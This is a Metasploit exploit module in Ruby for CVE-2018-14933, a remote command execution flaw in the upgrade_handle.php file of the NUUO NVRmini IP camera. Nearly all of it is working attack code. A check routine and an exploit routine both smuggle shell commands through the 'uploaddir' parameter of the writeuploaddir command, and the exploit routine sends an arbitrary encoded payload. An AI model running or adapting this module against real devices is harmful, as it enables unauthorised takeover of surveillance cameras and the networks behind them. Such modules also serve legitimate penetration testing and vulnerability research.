1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name'=> 'NUUO NVRmini upgrade_handle.php Remote Command Execution', 'Description' => %q{ This exploits a vulnerability in the web application of NUUO NVRmini IP camera, which can be done by triggering the writeuploaddir command in the upgrade_handle.php file. }, 'License' => MSF_LICENSE, 'Author'=> [ 'Berk Dusunur', # @berkdusunur 'numan turle' # @numanturle ], 'References' => [ ['URL', 'https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html'], ['URL', 'https://www.tenable.com/security/research/tra-2018-41'], ['CVE', '2018-14933'], ['EDB', '45070'] ], 'Privileged' => false, 'Payload'=> { 'DisableNops' => true }, 'Platform' => %w{ unix win linux }, 'Arch' => ARCH_CMD, 'Targets'=> [ ['NUUO NVRmini', { }], ], 'DisclosureDate' => 'Aug 04 2018', 'DefaultTarget'=> 0)) end def check res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'upgrade_handle.php'), 'vars_get' => { 'cmd' => 'writeuploaddir', 'uploaddir' => "';echo '#{Rex::Text.rand_text_alphanumeric(10..15)}';'" }} ) unless res vprint_error 'Connection failed' return CheckCode::Unknown end if res.code == 200 && res.body =~ /upload_tmp_dir/ return CheckCode::Vulnerable end CheckCode::Safe end def http_send_command(cmd) uri = normalize_uri(target_uri.path.to_s, "upgrade_handle.php") res = send_request_cgi({ 'method' => 'GET', 'uri'=>uri, 'vars_get' => { 'cmd' => 'writeuploaddir', 'uploaddir' => "';"+cmd+";'" }} ) unless res fail_with(Failure::Unknown, 'Failed to execute the command.') end res end def exploit http_send_command(payload.encoded) end end |